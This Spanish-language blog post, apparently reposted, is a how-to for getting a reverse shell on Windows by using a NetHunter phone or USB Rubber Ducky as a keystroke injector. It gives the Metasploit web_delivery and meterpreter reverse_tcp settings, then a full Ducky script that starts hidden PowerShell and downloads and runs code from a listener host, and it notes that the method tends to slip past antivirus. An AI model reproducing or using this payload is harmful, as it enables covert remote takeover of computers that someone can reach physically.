Conexión inversa usando como vector NetHunter o Rubber Ducky
Lo que vamos a hacer a continuación es algo muy simple, pero puede ser peligroso cuando se implementa.
Preparando el backdoor en Metasploit
Vamos a utilizar el módulo “script web delivery” (rapid7.com/db/modules/exploit/multi/script/web_delivery), que tiene la ventaja de no tener que crear un archivo ejecutable, y muchas probabilidades de transmitir el malware sin que el AV lo detecte.
Para nuestra prueba, elegimos el objetivo 2, que va a generar una secuencia de comandos que se utilizará en PowerShell
Configuración del payload
Payload: payload windows/meterpreter/reverse_tcp
LHOST: IP local, que recibirá la conexión
URIPATH: se puede poner simplemente una “/”
LPORT: puerto local, por defecto el 4444
Script: exploit -j
El payload es muy simple y se realiza en unos pocos segundos en la máquina objetivo.
Ahora lo que tenemos que hacer es poner la secuencia de comandos que se generó en el DuckHunter HID:
DELAY 1000
GUI r
DELAY 500
STRING powershell.exe -nop -w hidden -c $g=new-object net.webclient;
$g.proxy=[Net.WebRequest]::GetSystemWebProxy();
$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX
$g.downloadstring('http://192.168.1.27:8080/')
Y después de ejecutar la secuencia de comandos, obtenemos acceso remoto:
Para ver más opciones, solamente escribir el comando de help.
USB-Rubber-Ducky
Del mismo modo, también se puede utilizar el USB-Rubber-Ducky que proporciona muy buen soporte para la creación de payloads. Se puede hacer on line
en https://ducktoolkit.com/encoder.
El Rubber-Ducky se puede encontrar en http://hakshop.myshopify.com
Por último, os dejo un pequeño vídeo con una demo:
reverse connection using rubberducky or kalinethunter as a vector— c4io (@c4ioli) 16 de septiembre de 2016
>https://t.co/BkBsrZmW44
>https://t.co/u5Ge2tvV2D pic.twitter.com/8UlUIyBAkf
by c4io
#enjoy :)
Via: www.hackplayers.com
Conexión inversa usando como vector NetHunter o Rubber Ducky
Reviewed by Zion3R
on
18:46
Rating:
Reviewed by Zion3R
on
18:46
Rating:
